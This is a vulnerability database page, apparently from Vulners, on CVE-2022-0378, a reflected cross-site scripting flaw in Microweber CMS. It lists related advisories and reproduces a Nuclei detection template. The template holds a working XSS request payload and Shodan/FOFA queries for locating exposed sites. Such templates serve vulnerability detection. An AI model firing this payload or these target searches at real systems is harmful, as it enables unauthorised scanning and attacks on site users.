| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| Cross-site Scripting (XSS) - Reflected in microweber/microweber | 2 Jan 202212:01 | – | huntr | |
| CVE-2022-0378 | 26 Jan 202216:15 | – | attackerkb | |
| The vulnerability of the Microweber content management system arises from the lack of measures taken to protect the website structure. This allows attackers to carry out XSS attacks. | 9 Nov 202300:00 | – | bdu_fstec | |
| CVE-2022-0378 | 26 Jan 202218:19 | – | circl | |
| Microweber 跨站脚本漏洞 | 26 Jan 202200:00 | – | cnnvd | |
| CVE-2022-0378 | 26 Jan 202215:25 | – | cve | |
| CVE-2022-0378 Cross-site Scripting (XSS) - Reflected in microweber/microweber | 26 Jan 202215:25 | – | cvelist | |
| EUVD-2022-0433 | 3 Oct 202520:07 | – | euvd | |
| Cross-site Scripting in microweber | 28 Jan 202222:15 | – | github | |
| CVE-2022-0378 | 26 Jan 202216:15 | – | nvd |
id: CVE-2022-0378
info:
name: Microweber Cross-Site Scripting
author: pikpikcu
severity: medium
description: Microweber contains a reflected cross-site scripting in Packagist microweber/microweber prior to 1.2.11.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Apply the latest security patch or upgrade to a version that has addressed the vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-0378
- https://github.com/microweber/microweber/commit/fc7e1a026735b93f0e0047700d08c44954fce9ce
- https://huntr.dev/bounties/529b65c0-5be7-49d4-9419-f905b8153d31
- https://github.com/vohvelikissa/bugbouncing
- https://github.com/x86trace/Oneliners
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-0378
cwe-id: CWE-79
epss-score: 0.03866
epss-percentile: 0.88872
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: microweber
product: microweber
shodan-query:
- http.favicon.hash:780351152
- http.html:"microweber"
fofa-query:
- body="microweber"
- icon_hash=780351152
tags: cve2022,cve,microweber,xss,huntr,vuln
http:
- method: GET
path:
- '{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'mwui_init'
- 'onmousemove="alert(document.domain)'
condition: and
- type: status
status:
- 200
# digest: 4a0a004730450221008b40a6221d90d1375774fe5e8fcd7b70015d6eaa3d7d64443e6456cee63c48d1022028af5e3681277e0fec8915231927ae22c34b0bd202824d75ad8cf65d83a75441:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation